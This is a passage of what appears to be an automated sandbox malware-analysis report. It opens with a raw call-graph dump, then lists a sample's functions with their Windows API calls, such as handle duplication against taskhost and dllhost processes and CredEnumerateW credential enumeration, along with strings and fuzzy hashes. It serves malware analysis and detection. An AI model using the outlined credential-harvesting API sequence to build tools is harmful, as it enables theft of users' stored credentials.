37912 416935 16 API calls 37910->37912 38256 444283 13 API calls 37911->38256 37912->37897 37915 437612 memcpy 37915->37897 37916->37903 37917->37823 37919 432d58 37918->37919 37921 432d65 37918->37921 38330 432cc4 memset memset memcpy 37919->38330 37921->37831 37922->37835 37923->37841 37924->37823 37942 41703f 37925->37942 37927 43847a 37928 43848a 37927->37928 37929 43847e 37927->37929 37949 438270 37928->37949 37979 4446ea 11 API calls 37929->37979 37933 438488 37933->37863 37935 4384bb 37936 438270 134 API calls 37935->37936 37936->37933 37937->37855 37938->37865 37939->37861 37940->37855 37941->37855 37943 417044 37942->37943 37944 41705c 37942->37944 37948 417055 37943->37948 37981 416760 11 API calls 37943->37981 37945 417075 37944->37945 37982 41707a 37944->37982 37945->37927 37948->37927 37950 415a91 memset 37949->37950 37951 43828d 37950->37951 37952 438297 37951->37952 37953 438341 37951->37953 37955 4382d6 37951->37955 37954 415c7d 16 API calls 37952->37954 37988 44358f 37953->37988 37957 438458 37954->37957 37958 4382fb 37955->37958 37959 4382db 37955->37959 37957->37933 37980 424f26 123 API calls 37957->37980 38031 415c23 memcpy 37958->38031 38019 416935 37959->38019 37962 438305 37966 44358f 19 API calls 37962->37966 37968 438318 37962->37968 37963 4382e9 38027 415c7d 37963->38027 37965 438373 37969 4300e8 3 API calls 37965->37969 37971 438383 37965->37971 37966->37968 37968->37965 38014 43819e 37968->38014 37969->37971 37970 4383cd 37972 4383f5 37970->37972 38033 42453e 123 API calls 37970->38033 37971->37970 38032 415c23 memcpy 37971->38032 37975 438404 37972->37975 37976 43841c 37972->37976 37978 416935 16 API calls 37975->37978 37977 416935 16 API calls 37976->37977 37977->37952 37978->37952 37979->37933 37980->37935 37981->37948 37983 417085 37982->37983 37984 4170ab 37982->37984 37983->37984 37987 416760 11 API calls 37983->37987 37984->37943 37986 4170a4 37986->37943 37987->37986 37989 4435be 37988->37989 37990 44360c 37989->37990 37992 443676 37989->37992 37995 4436ce 37989->37995 37999 44366c 37989->37999 38034 442ff8 37989->38034 37990->37968 37991 443758 38004 443775 37991->38004 38043 441409 memset 37991->38043 37992->37991 37994 443737 37992->37994 37996 442ff8 19 API calls 37992->37996 37997 442ff8 19 API calls 37994->37997 38001 4165ff 11 API calls 37995->38001 37996->37994 37997->37991 38042 4169a7 11 API calls 37999->38042 38000 4437be 38005 4437de 38000->38005 38045 416760 11 API calls 38000->38045 38001->37992 38004->38000 38044 415c56 11 API calls 38004->38044 38008 443801 38005->38008 38046 42463b memset memcpy 38005->38046 38007 443826 38057 43bd08 memset 38007->38057 38008->38007 38047 43024d 38008->38047 38012 443837 38012->37990 38013 43024d memset 38012->38013 38013->38012 38015 438246 38014->38015 38017 4381ba 38014->38017 38015->37965 38016 41f432 110 API calls 38016->38017 38017->38015 38017->38016 38084 41f638 104 API calls 38017->38084 38020 41693e 38019->38020 38023 41698e 38019->38023 38021 41694c 38020->38021 38085 422fd1 memset 38020->38085 38021->38023 38086 4165a0 38021->38086 38023->37963 38028 415c81 38027->38028 38029 415c9c 38027->38029 38028->38029 38030 416935 16 API calls 38028->38030 38029->37952 38030->38029 38031->37962 38032->37970 38033->37972 38035 442ffe 38034->38035 38036 443094 38035->38036 38038 443092 38035->38038 38058 4414ff 38035->38058 38070 4169a7 11 API calls 38035->38070 38071 441325 memset 38035->38071 38072 4414a9 12 API calls 38036->38072 38038->37989 38042->37992 38043->37991 38044->38000 38045->38005 38046->38008 38048 4302f9 38047->38048 38053 43025c 38047->38053 38048->38007 38049 4302cd 38073 435ef3 38049->38073 38053->38048 38053->38049 38082 4172c8 memset 38053->38082 38055 4302dc 38083 4386af memset 38055->38083 38057->38012 38059 441539 38058->38059 38060 441547 38058->38060 38059->38060 38061 441575 38059->38061 38062 441582 38059->38062 38063 4418e2 38060->38063 38069 442bd4 38060->38069 38065 42fccf 18 API calls 38061->38065 38064 43275a 12 API calls 38062->38064 38066 4414a9 12 API calls 38063->38066 38067 4418ea 38063->38067 38064->38060 38065->38060 38066->38067 38067->38035 38068 441409 memset 38068->38069 38069->38067 38069->38068 38070->38035 38071->38035 38072->38038 38075 435f03 38073->38075 38077 4302d4 38073->38077 38074 435533 memset 38074->38075 38075->38074 38076 4172c8 memset 38075->38076 38075->38077 38076->38075 38078 4301e7 38077->38078 38079 43023c 38078->38079 38081 4301f5 38078->38081 38079->38055 38080 42b896 memset 38080->38081 38081->38079 38081->38080 38082->38053 38083->38048 38084->38017 38085->38021 38092 415cfe 38086->38092 38091 422b84 15 API calls 38091->38023 38093 41628e 38092->38093 38098 415d23 __aullrem __aulldvrm 38092->38098 38100 416520 38093->38100 38094 4163ca 38095 416422 10 API calls 38094->38095 38095->38093 38096 416422 10 API calls 38096->38098 38097 416172 memset 38097->38098 38098->38093 38098->38094 38098->38096 38098->38097 38099 415cb9 10 API calls 38098->38099 38099->38098 38101 416527 38100->38101 38105 416574 38100->38105 38102 415700 10 API calls 38101->38102 38103 416544 38101->38103 38101->38105 38102->38103 38104 416561 memcpy 38103->38104 38103->38105 38104->38105 38105->38023 38105->38091 38136 41bc3b 38106->38136 38109 41edad 86 API calls 38110 41f1cb 38109->38110 38111 41f1f5 memcmp 38110->38111 38112 41f20e 38110->38112 38116 41f282 38110->38116 38111->38112 38113 41f21b memcmp 38112->38113 38112->38116 38114 41f326 38113->38114 38117 41f23d 38113->38117 38115 41ee6b 86 API calls 38114->38115 38114->38116 38115->38116 38116->37872 38117->38114 38118 41f28e memcmp 38117->38118 38160 41c8df 56 API calls 38117->38160 38118->38114 38119 41f2a9 38118->38119 38119->38114 38122 41f308 38119->38122 38123 41f2d8 38119->38123 38121 41f269 38121->38114 38124 41f287 38121->38124 38125 41f27a 38121->38125 38122->38114 38162 4446ce 11 API calls 38122->38162 38126 41ee6b 86 API calls 38123->38126 38124->38118 38127 41ee6b 86 API calls 38125->38127 38128 41f2e0 38126->38128 38127->38116 38161 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38128->38161 38131->37872 38132->37872 38133->37872 38134->37868 38135->37869 38138 41bc54 38136->38138 38145 41be0b 38136->38145 38141 41bd61 38138->38141 38138->38145 38153 41bc8d 38138->38153 38163 41baf0 55 API calls 38138->38163 38140 41be45 38140->38109 38140->38116 38141->38140 38172 41a25f memset 38141->38172 38143 41be04 38170 41aee4 56 API calls 38143->38170 38145->38141 38171 41ae17 34 API calls 38145->38171 38146 41bd42 38146->38141 38146->38143 38147 41bdd8 memset 38146->38147 38148 41bdba 38146->38148 38149 41bde7 memcmp 38147->38149 38159 4175ed 6 API calls 38148->38159 38149->38143 38152 41bdfd 38149->38152 38150 41bd18 38150->38141 38150->38146 38168 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38150->38168 38151 41bdcc 38151->38141 38151->38149 38169 41a1b0 memset 38152->38169 38153->38141 38153->38146 38153->38150 38164 4151e3 38153->38164 38159->38151 38160->38121 38161->38116 38162->38114 38163->38153 38173 41837f 38164->38173 38167 444706 11 API calls 38167->38150 38168->38146 38169->38143 38170->38145 38171->38141 38172->38140 38174 4183c1 38173->38174 38177 4183ca 38173->38177 38220 418197 25 API calls 38174->38220 38178 4151f9 38177->38178 38194 418160 38177->38194 38178->38150 38178->38167 38179 4183e5 38179->38178 38203 41739b 38179->38203 38182 418444 CreateFileW 38184 418477 38182->38184 38183 41845f CreateFileA 38183->38184 38185 4184c2 memset 38184->38185 38186 41847e GetLastError free 38184->38186 38206 418758 38185->38206 38187 4184b5 38186->38187 38188 418497 38186->38188 38221 444706 11 API calls 38187->38221 38190 41837f 49 API calls 38188->38190 38190->38178 38195 41739b GetVersionExW 38194->38195 38196 418165 38195->38196 38198 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38196->38198 38199 418178 38198->38199 38200 41817f 38199->38200 38201 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38199->38201 38200->38179 38202 418188 free 38201->38202 38202->38179 38204 4173d6 38203->38204 38205 4173ad GetVersionExW 38203->38205 38204->38182 38204->38183 38205->38204 38207 418680 43 API calls 38206->38207 38208 418782 38207->38208 38209 418160 11 API calls 38208->38209 38211 418506 free 38208->38211 38210 418799 38209->38210 38210->38211 38212 41739b GetVersionExW 38210->38212 38211->38178 38213 4187a7 38212->38213 38214 4187da 38213->38214 38215 4187ad GetDiskFreeSpaceW 38213->38215 38217 4187ec GetDiskFreeSpaceA 38214->38217 38219 4187e8 38214->38219 38218 418800 free 38215->38218 38217->38218 38218->38211 38219->38217 38220->38177 38221->38178 38257 424f07 38222->38257 38224 4251e4 38225 4251f7 38224->38225 38226 4251e8 38224->38226 38265 4250f8 38225->38265 38264 4446ea 11 API calls 38226->38264 38228 4251f2 38228->37903 38230 425209 38233 425249 38230->38233 38236 4250f8 127 API calls 38230->38236 38237 425287 38230->38237 38273 4384e9 135 API calls 38230->38273 38274 424f74 124 API calls 38230->38274 38231 415c7d 16 API calls 38231->38228 38233->38237 38275 424ff0 13 API calls 38233->38275 38236->38230 38237->38231 38238 425266 38238->38237 38276 415be9 memcpy 38238->38276 38240->37897 38241->37903 38242->37903 38243->37903 38244->37903 38245->37903 38246->37908 38247->37890 38249 4442eb 38248->38249 38252 444303 38248->38252 38250 41707a 11 API calls 38249->38250 38251 4442f2 38250->38251 38251->38252 38329 4446ea 11 API calls 38251->38329 38252->37896 38254 444300 38254->37896 38255->37906 38256->37915 38258 424f1f 38257->38258 38259 424f0c 38257->38259 38278 424eea 11 API calls 38258->38278 38277 416760 11 API calls 38259->38277 38262 424f18 38262->38224 38263 424f24 38263->38224 38264->38228 38266 425108 38265->38266 38272 42510d 38265->38272 38311 424f74 124 API calls 38266->38311 38269 42516e 38271 415c7d 16 API calls 38269->38271 38270 425115 38270->38230 38271->38270 38272->38270 38279 42569b 38272->38279 38273->38230 38274->38230 38275->38238 38276->38237 38277->38262 38278->38263 38289 4256f1 38279->38289 38307 4259c2 38279->38307 38284 4260dd 38323 424251 120 API calls 38284->38323 38288 429a4d 38291 429a66 38288->38291 38292 429a9b 38288->38292 38289->38288 38290 422aeb memset memcpy memcpy 38289->38290 38294 4260a1 38289->38294 38303 4259da 38289->38303 38305 429ac1 38289->38305 38289->38307 38310 425a38 38289->38310 38312 4227f0 memset memcpy 38289->38312 38313 422b84 15 API calls 38289->38313 38314 422b5d memset memcpy memcpy 38289->38314 38315 422640 13 API calls 38289->38315 38317 4241fc 11 API calls 38289->38317 38318 42413a 90 API calls 38289->38318 38290->38289 38324 415c56 11 API calls 38291->38324 38296 429a96 38292->38296 38326 416760 11 API calls 38292->38326 38321 415c56 11 API calls 38294->38321 38327 424251 120 API calls 38296->38327 38299 429a7a 38325 416760 11 API calls 38299->38325 38322 416760 11 API calls 38303->38322 38306 425ad6 38305->38306 38328 415c56 11 API calls 38305->38328 38306->38269 38307->38306 38316 415c56 11 API calls 38307->38316 38310->38307 38319 422640 13 API calls 38310->38319 38320 4226e0 12 API calls 38310->38320 38311->38272 38312->38289 38313->38289 38314->38289 38315->38289 38316->38303 38317->38289 38318->38289 38319->38310 38320->38310 38321->38303 38322->38284 38323->38306 38324->38299 38325->38296 38326->38296 38327->38305 38328->38303 38329->38254 38330->37921 38332 432fc6 38331->38332 38334 432fdd 38332->38334 38337 43bd08 memset 38332->38337 38335 43024d memset 38334->38335 38336 43300e 38334->38336 38335->38334 38336->37848 38337->38332 40215 4147f3 40218 414561 40215->40218 40217 414813 40219 41456d 40218->40219 40220 41457f GetPrivateProfileIntW 40218->40220 40223 4143f1 memset _itow WritePrivateProfileStringW 40219->40223 40220->40217 40222 41457a 40222->40217 40223->40222

                                                                                                                                                Executed Functions

                                                                                                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                • API String ID: 708747863-3398334509
                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
